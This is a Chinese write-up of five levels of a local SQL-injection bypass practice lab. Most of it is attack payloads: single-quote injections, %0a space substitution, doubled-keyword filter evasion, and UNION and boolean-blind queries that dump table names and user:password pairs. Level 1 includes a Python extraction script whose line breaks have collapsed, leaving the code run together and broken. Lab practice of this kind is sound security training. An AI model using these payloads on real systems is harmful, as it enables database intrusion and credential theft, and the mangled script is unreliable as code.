sqli.bypass靶场本地小皮环境（1-5关）

1、第一关

http://sqli.bypass/index1.php

单引号报错id=1'

双引号正常id=1''，应该是单引号闭合

id=1'--+注释符用不了，%20和+都用不了

%0a可以用

没有报错，用布尔盲注，POC：id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1

脚本跑数据比较方便

import string
from time import time, sleepimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.bypass/index1.php?id=1'%0a"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1url_db = url + f"and(substr(database(),{p},1)='{a}')%0aand%0a'1'='1"res = requests.get(url_db)if "Your Login name:admin" in res.text:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')%0aand%0a'1'='1"num += 1res = requests.get(url_db)if "Your Login name:admin" in res.text:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')%0aand%0a'1'='1"num += 1res = requests.get(url_db)if "Your Login name:admin" in res.text:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行zds = columns.split(",")zd = ""for a in zds:if "secret" in a:zd = a# 获取所有账号users = ""print(f"所有账号密码数据:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:if a == "UNHEX('2D')":url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)={a})%0aand%0a'1'='1"else:url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)='{a}')%0aand%0a'1'='1"num += 1res = requests.get(url_db)if "Your Login name:admin" in res.text:if a == "UNHEX('2D')":a = '-'users = f"{users}{a}"print(a, end='')num = 0

2、第二关

输入1查询，抓包

应该还是单引号闭合，and和or被过滤

试一下like,没被过滤

POC：id=-1'+union+select+1,2,3,4,5,6,7,'13

id=-1'+union+select+1,2,3,4,database(),6,7,'13

-1' union select 1,2,3,4,(select group_concat(table_name) from infORmation_schema.tables where table_schema='dvwa'),6,7,'13

id=-1' union select 1,2,3,4,(select group_concat(column_name) from infORmation_schema.columns where table_schema='dvwa'+AND+table_name='users'),6,7,'13

id=-1' union select 1,2,3,4,(select group_concat(user,'~',passwOrd) from dvwa.users),6,7,'13

3、第三关

单引号闭合

8列数据

显示位4和5

id=-1' union select 1,2,3,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7,8--+

id=-1' union select 1,2,3,database(),(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' aandnd table_name='users'),6,7,8--+

and和or替换为空了，可以双写绕过

id=-1' union select 1,2,3,database(),(select group_concat(user,'~',password) from dvwa.users),6,7,8--+

4、第四关

和前年一样也是单引号闭合，看下过滤了啥

id=-1' union select 1,2,3,4,5,6,7,8--+

union和select没过滤，可以查到显示位

提示检测到sql注入

id=-1' union select 1,2,3,database(),5,6,7,8--+

这个检测and和or,所以information_schema里包含了or没法用了

id=-1' union select 1,2,3,user(),version(),6,7,8--+

5、第五关

单引号有报错

还是单引号闭合

id=1' union select 1,2,3,4,5,6,7,8--+

报错了，应该是啥被过滤掉了，试试双写绕过

id=-1' ununionion selselect ect 1,2,3,4,5,6,7,8--+

那就好办了

id=-1' ununionion selselect ect 1,2,3,datadatabasebase(),5,6,7,8--+

id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(table_name) frofromm infoorrmation_schema.tables w where here table_schema like '%dvwa'),6,7,8--+

id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(column_name) frofromm infoorrmation_schema.columns w where here table_schema like 'dvwa' anandd table_name like '%uusersers'),6,7,8--+